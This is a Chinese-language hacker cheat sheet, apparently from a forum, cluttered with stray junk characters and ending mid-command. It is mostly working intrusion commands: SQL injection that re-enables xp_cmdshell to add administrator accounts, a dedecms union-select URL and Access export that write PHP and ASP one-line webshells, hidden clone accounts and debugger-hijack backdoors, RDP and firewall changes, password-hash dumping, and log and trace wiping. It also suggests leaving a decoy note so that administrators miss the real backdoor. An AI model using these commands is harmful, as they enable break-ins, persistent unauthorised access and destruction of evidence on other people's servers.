( n9 g0 B9 s) _# p& E
1.net user administrator /passwordreq:no
3 R3 ~9 O/ ^$ I+ r1 D这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
Q( n: ?+ t3 f, L6 X2.比较巧妙的建克隆号的步骤3 Q/ K P0 j1 _* \. A
先建一个user的用户
9 A+ l- O8 B! ^5 v+ P然后导出注册表。然后在计算机管理里删掉& f* H7 O* Q* {
在导入,在添加为管理员组
; N8 }) e- i& t3.查radmin密码 B0 p' \5 G; m$ q4 b8 }) Y
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
( i1 K# ^1 |4 p5 M. |1 `7 n4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]% c: J& v. P8 u% C/ ~ S
建立一个"services.exe"的项
. i4 e; [4 k% B, g; r再在其下面建立(字符串值)5 M( U \* c/ M
键值为mu ma的全路径
( a0 C. u5 L' c- Z. r2 V7 Z$ `5.runas /user:guest cmd' o) ]$ D: F6 j+ M1 T) e# x" d
测试用户权限!
* Y9 x' n: T6 b6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?/ O* G6 j0 |! |7 _9 e# q: a
7.入侵后漏洞修补、痕迹清理,后门置放:
' L8 b8 T* O/ N% f2 F7 P. \, Z基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
" g; ~! u! E% _$ R5 ]# y# @: d8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
+ x0 ]$ w9 @- r. n4 d) O$ g# i! d% |
for example! p& E$ S8 F) O" c1 k
2 |- {) \7 @5 e& k- X2 ?declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'/ z+ @' Z {$ m& O7 P. r. v0 q
8 z4 }4 A% b$ ]) w4 cdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'. ?/ P+ ~5 ]$ |( b2 T# I, z
; j4 Y+ e# Z v! O8 G& D$ `9:MSSQL SERVER 2005默认把xpcmdshell 给ON了4 I0 p3 f6 H5 c$ E
如果要启用的话就必须把他加到高级用户模式
' ^4 s- R+ f7 \2 B: a* y( K/ u可以直接在注入点那里直接注入
& ~, y. z. G, f9 ^id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--: |' d* ?- k" ^, n
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--$ G, v( _6 ]6 q. q( `/ p/ o: \4 D
或者/ Y* q& O, I& d1 E' c
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'4 b. k4 \ I5 P4 S2 ]0 a* G
来恢复cmdshell。
8 z/ x C) i) b5 ^5 d3 f7 k9 X! \
( L( {' P) [: P% b" r! ~分析器$ h5 [9 d* E" r% b! T+ ^: [
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--1 A. l# r& @ n* c. E
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
/ B& b* S$ j9 N0 f/ G9 Q10.xp_cmdshell新的恢复办法
* c- R5 q( w4 m3 @# T; Oxp_cmdshell新的恢复办法- S! \+ X7 ?9 w" m& r2 I
扩展储存过程被删除以后可以有很简单的办法恢复:
: u" q: N- S; E! b+ o删除- e& T) ]8 b, X' t# N- u; b
drop procedure sp_addextendedproc
& Y; ?6 _* {' fdrop procedure sp_oacreate
5 C) d9 N+ `( ]& {4 Uexec sp_dropextendedproc 'xp_cmdshell'
$ D& @7 B, \8 @3 h
: p' |% ~" C! `6 B" h4 w; v; V恢复2 l) N) \2 M6 ^5 l& u$ n [/ r
dbcc addextendedproc ("sp_oacreate","odsole70.dll")* E7 m3 J4 Y6 p+ A1 u, S7 O
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")7 Z+ M1 H$ C! P9 E. I8 K" _
- L. [8 b% V L# t8 o) ?- Q$ x# M这样可以直接恢复,不用去管sp_addextendedproc是不是存在
2 N. I& Q9 [' m3 m% Y# ~/ Z
- ?" ]( C3 w" |1 c: E2 u9 }-----------------------------
3 A4 @- d1 t& b G
' ~# m5 r/ E Q$ s' I5 x" k删除扩展存储过过程xp_cmdshell的语句:) e3 ^3 e1 }/ X
exec sp_dropextendedproc 'xp_cmdshell'# c# h# j/ ?* S2 d- R9 p
0 W& z; t1 v3 b+ H- t! e
恢复cmdshell的sql语句! I+ I, `# S9 t' s! F( C9 z' |
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
/ q& ~0 w8 P0 u) M) Y# _- J. U; `7 D5 i$ ?; X0 Z: u
/ n: H$ y0 Z( {& J. H9 H
开启cmdshell的sql语句1 o5 s' w" D5 W& A
- r m9 k l' X& sexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
: _; B" A4 Y" X/ K$ H7 \4 @" ?" U. v% {1 y9 ]
判断存储扩展是否存在
% J. s6 F9 Y* K" R! D5 f5 ]select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
0 j7 E, F5 A) [. u' k. q$ H. ~返回结果为1就ok
, A; K5 h, `$ k. e
' N5 i& {; L2 H- d# e/ T, S7 c恢复xp_cmdshell
" ?' g6 w D: p( [9 L" x# @* \exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
# P* F/ W0 Q' i0 {8 c返回结果为1就ok
8 g$ x3 U0 U' E3 i) p) Y$ z' c1 { R& r$ L# q# ~6 W. W# {" }1 K
否则上传xplog7.0.dll) y* L# J3 h0 S/ X) c6 z
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
# `; I' o# t8 D" Y1 H) P
; O; H+ Y2 ^3 k: N" S6 `9 [# F6 D堵上cmdshell的sql语句
; B8 B u. B) j- M* g% P: ~2 ^sp_dropextendedproc "xp_cmdshel
! R' T: y) v( U, v3 B" i5 `( D4 s-------------------------
y- z; K5 w4 u, q* Q% _! a清除3389的登录记录用一条系统自带的命令:
" p7 C, h$ U# g$ v& k' Creg delete "hkcu\Software\Microsoft\Terminal Server Client" /f. W5 I$ L9 q$ }% X% n3 i: y
% }5 q) Z7 e' \* y
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
( V" V/ U6 Z7 F( a在 mysql里查看当前用户的权限7 Z3 e0 P2 J# i0 b8 G( y
show grants for
+ i( M# X, u4 X5 f# b! r) S m0 q8 c6 r. b* u
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
2 i9 M% W# F* [6 S( k v
# V. }% Q8 d7 B4 }# E: Q& ?8 P& `1 S% v( v
Create USER 'itpro'@'%' IDENTIFIED BY '123';
6 Y8 o) {# }# k1 v4 h+ L, p; ?* E3 Z! x6 U8 Z) D5 k6 |
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION0 g b0 ^( L) y, f! q
; I T0 L3 m/ T8 {+ H W+ y Z
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
* ~ d/ V) j8 Y" M$ X
3 U$ w X& J8 O, ]% B/ B4 @( IMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
! y# o- E m- J# H
) R* P5 T4 ~- l搞完事记得删除脚印哟。
/ y+ y- F- ~; `
0 T" G5 d% |- e" ]Drop USER 'itpro'@'%';
( T& _& ? y8 S* n/ V( ? M: ^" @! `6 m7 g* y8 `; w
Drop DATABASE IF EXISTS `itpro` ;
( t+ r: {9 I) l, L+ l V8 T3 }$ e T0 W
当前用户获取system权限
9 d8 G/ N, C- zsc Create SuperCMD binPath= "cmd /K start" type= own type= interact; [" s5 S, M5 B4 z2 m
sc start SuperCMD* _& U5 @- C0 b0 l- @% R
程序代码
( d/ y7 O( _; Z: X9 g: U7 r<SCRIPT LANGUAGE="VBScript">" h- W: @- q% U7 f% f
set wsnetwork=CreateObject("WSCRIPT.NETWORK")) f/ p' k; K& ^ |
os="WinNT://"&wsnetwork.ComputerName
7 F, ~1 w" l7 N7 j3 tSet ob=GetObject(os)
6 o& @' O6 u1 ? Y2 }# T4 TSet oe=GetObject(os&"/Administrators,group"). |/ e, w N9 b9 o3 D& I) a# j
Set od=ob.Create("user","nosec")
/ B5 ]% C, N6 M3 Z3 n" |7 kod.SetPassword "123456abc!@#"
+ F. ~) H& p6 V6 [$ S/ i" Tod.SetInfo* u; F6 @3 B6 H; n% M- M
Set of=GetObject(os&"/nosec",user)
, K2 x2 f* w* r. ^oe.add os&"/nosec"& d8 f. ^4 |( v+ M* g+ a _
</Script>
& d4 k0 j( t9 k' V2 B<script language=javascript>window.close();</script>5 k: t# c& ?8 B" ~% f V* q( g
0 ?: k. x: y: o6 W
8 i" N" ^/ o5 I! X# C O
3 a9 B D3 C& ~: Q* E" y+ l" z: N0 H0 [; [1 x5 f
突破验证码限制入后台拿shell
( A; `! V0 L4 q程序代码
, k; B. D" h- G* rREGEDIT4
9 A2 p8 l6 t2 |[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
( ?1 t5 C+ [* K9 k" d"BlockXBM"=dword:00000000# k* z9 l+ k6 B' W, @% b! F
! @; O$ e6 ~% e9 D# ]7 g保存为code.reg,导入注册表,重器IE
' \3 H9 p+ D) O0 S2 A7 g2 J就可以了. V! w0 ? O7 {2 o
union写马' l* u8 M6 _, u* P) M2 G
程序代码
! u. Q; |" Z/ L+ x8 ^; vwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*" I0 Z( C0 h W, h
! G! ~* [& Y0 e2 F: s应用在dedecms注射漏洞上,无后台写马
' Q- f7 F8 }( C4 Q/ o- e( s4 Idedecms后台,无文件管理器,没有outfile权限的时候9 ^$ S7 `& p( T
在插件管理-病毒扫描里
9 {1 r0 C/ |8 L" V写一句话进include/config_hand.php里
6 G9 D- { d9 F8 r. \7 y程序代码
; @- a1 L' d8 J4 `) K>';?><?php @eval($_POST[cmd]);?>
3 K3 w' r- c* r2 n- B4 l0 z) k5 D; u' U7 o3 k
5 l) ?- m" M" {0 d* s: v" ~如上格式
) r+ S! N4 g$ E; x% _2 l4 n/ C* X: q% e2 }
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解3 o1 q" F* @. B& @
程序代码5 \/ ]+ ^2 c, ^. P
select username,password from dba_users;
! W- f% \' c4 D7 ~& E& O1 h7 n9 ?. P8 |- {2 [+ K/ H& d
* }2 l) S6 f. @+ n3 J
mysql远程连接用户/ G) I# D2 b Y8 I" a0 J
程序代码
: ?$ E0 ^3 ]: |. F; K, W6 Q1 _8 x2 ]# P1 }
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme'; L. i4 i) }/ g
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
G1 ?" ?- `$ H/ N/ p) Q& G DMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
( g+ h1 @ G6 Y' B! f. Z& JMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
6 V X S; _0 n& z' @
g2 }8 v$ `7 A8 l$ M1 c. q$ H) q' a! V5 L5 v
1 u2 b# R) p" O: P p8 J0 ^: Z8 q8 U! A; r
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0$ w" X. O4 C5 q: y6 E
' \. `$ `) `# V1 }; G/ `1.查询终端端口
4 C& N+ \! X4 Z8 `8 O8 G- S& B" Z) V/ S( I% i; |* T* ~
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
' F& `( d5 Q* T ^) X; j$ k& y$ w6 g" M, M6 w
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
& ]8 ~# g7 V F- f, J( u0 ^type tsp.reg9 H' u/ Y( T" z
* H+ E/ s* ?9 @$ V
2.开启XP&2003终端服务
6 W2 ]# P* M6 F7 @6 y" L" p1 @" I+ V; g+ W9 f$ F5 W
3 k! D# J$ A8 W R$ b% x
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
9 E$ k; ]/ Q7 _2 A6 N6 g+ \
# A" ^. r7 Y$ q! J @
) @, }: t3 ]) C1 ^REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
/ v0 w" a# ?& k0 O
+ `8 C: k2 [8 G$ e3.更改终端端口为20008(0x4E28)
+ U x9 h/ C$ k( ]4 L. ~9 K$ w, s- y8 h# [1 |) x
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f' G# U. L6 {! B
" W8 d" D9 o6 a# x- f5 ~7 |( f. ~REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
8 E+ Y. s& u( N# n W
+ O; }# g8 E3 ?+ |& |. z1 j: M5 p4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制0 w5 ^; N V) E
6 X4 j8 N) Z2 o s/ T$ F1 o+ N* DREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
. }+ j% c- S( d* ~/ {! P, P5 [2 h+ h
5 {1 _1 h7 V, h# P: y; A+ H
5.开启Win2000的终端,端口为3389(需重启)1 A, n. `% c6 |& }# G
* Y4 Z9 z9 m7 V7 [3 f& Z
echo Windows Registry Editor Version 5.00 >2000.reg
* l) y- ]6 K% T- v" H+ Uecho. >>2000.reg
k' h% V( H; y* Oecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg N9 b3 i! G( m2 S: R
echo "Enabled"="0" >>2000.reg
% R9 y5 j: I5 l, e n. s+ Oecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
! A( D g7 N6 o2 Vecho "ShutdownWithoutLogon"="0" >>2000.reg
8 A [6 \2 S5 G/ Z2 Recho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg % b& e3 }, Y. {% ?# r* e; J% e
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg u8 {2 i6 O' @, M- m Y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg 6 ~6 o# M7 |5 ]- @% ~: v1 S
echo "TSEnabled"=dword:00000001 >>2000.reg " M' M5 \0 P7 \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg 0 S) X6 k. n5 _) e
echo "Start"=dword:00000002 >>2000.reg
o6 X0 D0 J2 [/ d5 v. Oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg ~1 O: j& |' `7 q, j
echo "Start"=dword:00000002 >>2000.reg
6 [" o# T! S. J ~$ K" h3 d$ Kecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
- f |- c; |$ h- zecho "Hotkey"="1" >>2000.reg - ]6 {! r' q8 U
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg 3 S1 y2 r4 o _3 W" J5 t
echo "ortNumber"=dword:00000D3D >>2000.reg
+ K' b3 P& ?5 d+ {0 [2 P3 N! w: o; n! Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 7 Q% w! i* _) F4 c8 Z
echo "ortNumber"=dword:00000D3D >>2000.reg u( Y6 g Q2 h
5 Z$ X9 f9 l6 n u
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
6 X$ u, \3 U7 W! q/ O( }
$ L6 a" f. g/ {2 f# f@ECHO OFF & cd/d %temp% & echo [version] > restart.inf' u1 m' C0 w1 T! P+ q" z b
(set inf=InstallHinfSection DefaultInstall)
; _& M1 J6 ^( ?2 gecho signature=$chicago$ >> restart.inf
9 e: E- W. B ?! {$ F1 K, eecho [defaultinstall] >> restart.inf7 K8 X. b2 A( j5 W# q) l! z
rundll32 setupapi,%inf% 1 %temp%\restart.inf: R7 P3 D' R! c" r0 ^+ X0 M0 C" y
4 `, Y$ n. Z3 Y3 D
( I i! x( C9 y" ~% c' I- p7.禁用TCP/IP端口筛选 (需重启)3 A$ Y2 H/ r4 }0 [8 N
# w0 z- b! w7 w; yREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f: T; i) B* a: Z' \
1 {' Y- y0 C/ j' [" `0 U
8.终端超出最大连接数时可用下面的命令来连接
' Q* f/ P3 L& N; t4 \4 p1 a V# R: a5 K C. h
mstsc /v:ip:3389 /console* N% n8 r% Y( o6 {& Z; h" s
/ f4 H7 a) { ` Q/ O- r& J; F
9.调整NTFS分区权限1 n, N0 D d& x2 [& i
( w' J# `! C) ~6 Q0 {
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)% R |' N5 X6 E& |7 H* P) U
' z! L/ i, }' n: M3 e% Z# C6 mcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
: U: L( T+ x- m% Y( U7 k
O, _2 y3 k! [3 \* [ e: R9 g1 _------------------------------------------------------
4 G2 ^) M7 }7 c4 [- }4 v$ _3389.vbs
; n9 m1 v! T, v3 ~- `' j" \2 kOn Error Resume Next, L& o# B0 u* b8 ^* Q# b$ ^
const HKEY_LOCAL_MACHINE = &H80000002
: k5 r" W; q3 G" O' {strComputer = "."
, Y# r, B, o: p' n8 }4 l8 b# ZSet StdOut = WScript.StdOut/ x+ Q+ _, P. L# ^
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_0 [& s: L# s/ w) X6 E
strComputer & "\root\default:StdRegProv")
& L8 I- D c: estrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
: M/ |4 Q7 _( ]* Q) B8 Z+ Xoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
7 ^8 B6 d$ g% G' `strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
D: q7 w J5 @1 `. {/ D7 horeg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
. K9 e, T5 P f- `strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
* M7 V0 c7 ^5 `; i+ h* v3 q3 AstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
# W* z2 j& P8 e" JstrValueName = "fDenyTSConnections": g5 R4 S) J* j
dwValue = 01 G* S+ T' f s2 f, T
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue) D" {/ `6 W9 ~- B2 M1 t6 ?9 {; E9 V( O
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp", l5 t* w( }% a! l
strValueName = "ortNumber"
/ `6 F% H" _) d5 a9 TdwValue = 33897 F. M! X: a! v1 `
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
% B# t" i- t1 A# m. U+ KstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
/ B+ s! m9 t& xstrValueName = "ortNumber"2 r! k+ s% @/ P! c/ u _- D
dwValue = 3389
) {4 I, O+ x; y4 {8 |* Roreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue0 m" X8 g2 m8 m' M' ]# i' F& m
Set R = CreateObject("WScript.Shell")
1 o7 V* G8 U. r( G9 M1 Q! N5 BR.run("Shutdown.exe -f -r -t 0")
$ I5 {8 m n4 M8 T9 ?4 ?
& Z O7 v! J7 ~7 ~9 g7 r4 R w删除awgina.dll的注册表键值- H1 _- f) A7 q* z9 z
程序代码& N& ^& p7 z; D' h
. s8 H- A0 J0 J8 _
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
( K6 P- D& H* G: i" @! c& \
7 C. m& [: i5 e, l1 W- T" _$ W( s7 Z5 Y- C% `8 U& g
8 a9 Q) s! _+ Y% c+ f f, h; \- _# T0 \7 l, h! q x
程序代码( [ }. j# X8 O# e* M- s3 g7 c% C/ c$ i
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
( @/ ]& E: O! F2 ^& j
8 E0 T6 {% j+ T8 N设置为1,关闭LM Hash) M% g3 s) o8 L$ i8 ?; s
1 q/ m" @4 e% V: K数据库安全:入侵Oracle数据库常用操作命令
9 j4 r* n( x% G2 j9 y最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
7 t9 E( I! p" \2 q1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。$ \% P a/ ?" O* j8 `7 M1 I, ~
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
% Q7 Q" |5 b$ F0 j' W! {3、SQL>connect / as sysdba ;(as sysoper)或# H: l/ C+ w, p- ?
connect internal/oracle AS SYSDBA ;(scott/tiger)4 Q" n! b V1 K2 _, z& q# R( R
conn sys/change_on_install as sysdba;
8 @6 k# N3 |2 R) k4、SQL>startup; 启动数据库实例* P! i2 s- ?" _; c
5、查看当前的所有数据库: select * from v$database;
' ?7 {- k6 |3 G, |3 N5 |. \select name from v$database;' m9 {9 a* O4 ~
6、desc v$databases; 查看数据库结构字段
9 V$ t- J7 o7 V2 F; C" Z7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
# H( h4 }5 A2 c( M- n$ pSQL>select * from V_$PWFILE_USERS;+ g# G* @+ R! i. l* M4 }- c' Q
Show user;查看当前数据库连接用户2 B8 q, j8 k; p/ v) i
8、进入test数据库:database test;
& r6 D2 L! v4 O' W2 {$ U9、查看所有的数据库实例:select * from v$instance;
% C6 L( b$ r" K& M( m/ W如:ora9i: ^+ y5 k- W* Y, l7 a
10、查看当前库的所有数据表:/ z! q8 i( E! o) ~$ W; ~$ p
SQL> select TABLE_NAME from all_tables; T" ~0 f- c! e4 `% e
select * from all_tables;, j T' E3 Y& n, o8 C5 d
SQL> select table_name from all_tables where table_name like '%u%';& f9 D- _# k5 E2 Y5 w8 `( |
TABLE_NAME
. N& N9 D! _; O& ]% p------------------------------, w( V* _$ v W7 o/ I
_default_auditing_options_
- ^. t5 c# j( j; v Y8 h11、查看表结构:desc all_tables;
! K/ i$ w7 v% M, R6 W12、显示CQI.T_BBS_XUSER的所有字段结构:* t5 n3 y% b$ Z6 _) l/ t' G
desc CQI.T_BBS_XUSER;
( D2 Q. a6 E. p13、获得CQI.T_BBS_XUSER表中的记录:
/ {7 i$ \1 C6 sselect * from CQI.T_BBS_XUSER;
2 A3 X' W- C" E% Z14、增加数据库用户:(test11/test)
! j# f9 U+ F5 h+ t$ }7 Qcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
4 l7 l( ~. ~* P, W d15、用户授权:
- G; J- x9 T/ l# ]( M9 r/ S5 G! Kgrant connect,resource,dba to test11;
$ B% h2 r- y" ?& V; Y7 Xgrant sysdba to test11;
) p# Q5 F2 ?. W5 v: Ucommit;
& E" P7 N2 g1 G16、更改数据库用户的密码:(将sys与system的密码改为test.)+ X1 @ }& r1 I$ x
alter user sys indentified by test;
6 l& M2 ` M, K; Q- falter user system indentified by test;
. i; o X) \' r
7 j/ |0 }; @$ ?applicationContext-util.xml
( Z+ M9 R# _3 l! Z( N3 aapplicationContext.xml# k" N$ E* p, G/ I* `" j
struts-config.xml
( }( Q% m% O" q. u2 p: p8 f( [9 Z+ `web.xml, u% a7 n+ H% w
server.xml
2 |' V. R5 B3 c0 e/ W; ]" Y/ ttomcat-users.xml+ c7 H. l9 f7 N2 N5 ~3 E; |
hibernate.cfg.xml
% y0 t( o& _9 c; F% T) I" e& x2 X8 Adatabase_pool_config.xml
/ Y S G# Y( D* w8 h9 f- O. z+ j- o
0 k5 v. F% C2 a0 M: x9 X8 {( `\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置0 M3 O5 l) n6 f `3 @% H+ @0 I- U
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
* _6 b$ |$ r: G; e\WEB-INF\struts-config.xml 文件目录结构
9 C6 h5 \8 R6 F3 w
" m" t! i4 n5 _spring.properties 里边包含hibernate.cfg.xml的名称; \, @6 X: e! ]" Z6 l
3 z; r5 Y$ \" I/ M# [2 \: J5 h% J- K4 R6 x' M7 \7 I
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
/ N- y! J. t# d& t: ~# S! W) l9 @6 a7 ~2 Q7 A6 H3 G
如果都找不到 那就看看class文件吧。。8 |" }5 U$ o' A, q
" b* p! ?: R. p- }0 [, {
测试1:' G2 F5 J# g6 l+ Z; u1 {, J4 N& d. ]
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
1 e+ J9 ]9 G9 J U. N( g) X7 |9 F! ~) N& Z$ l( u, c5 |8 a6 `7 W+ w/ z
测试2:
$ d& N! A( m: s$ F1 i
: c' o2 t( ~# `( Q8 l; L4 ocreate table dirs(paths varchar(100),paths1 varchar(100), id int)
& K% d& [5 n% [, ]0 g3 L6 c0 f# K2 N' L8 r7 X; |. p
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--$ T- B `9 e( k
9 z Q# m# M4 h; W- \1 o$ a
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t12 k' P& \ e9 t/ u( b4 x
# g( Y) a1 |" g3 e
查看虚拟机中的共享文件:5 }- e9 V( o, p) t1 W
在虚拟机中的cmd中执行8 K; j! z" ~) Q# h1 L
\\.host\Shared Folders
j' v) |# c8 O$ s
+ a& z' N0 p* \% l1 G! {4 ~1 _" y! _cmdshell下找终端的技巧# {) q& L- O9 S) c w
找终端:
- }, n4 v4 ^7 v3 C% j0 p+ s第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
N9 {3 a; f( D* Z, r9 p. ? 而终端所对应的服务名为:TermService 5 A: \7 k" F4 U6 R) \2 V1 z
第二步:用netstat -ano命令,列出所有端口对应的PID值!
, S/ }$ R) u; [2 y 找到PID值所对应的端口
$ D6 _6 z! K+ V; y
/ L( C# y j8 G7 F0 j, H7 ]查询sql server 2005中的密码hash7 V6 k9 K2 y6 O' n; J
SELECT password_hash FROM sys.sql_logins where name='sa'0 N- a9 f: \- Q7 F3 r! v) z
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
/ J) ?5 q4 y/ Laccess中导出shell
[& E3 e {# Q+ j5 ?# v7 j* M
中文版本操作系统中针对mysql添加用户完整代码:
/ h }% ^ h2 v5 r2 l: F0 t
" k' k% M) ^! ]3 ]use test;
) \# r0 g, O, }3 [5 D# rcreate table a (cmd text);1 j1 V# M! q1 g( z
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
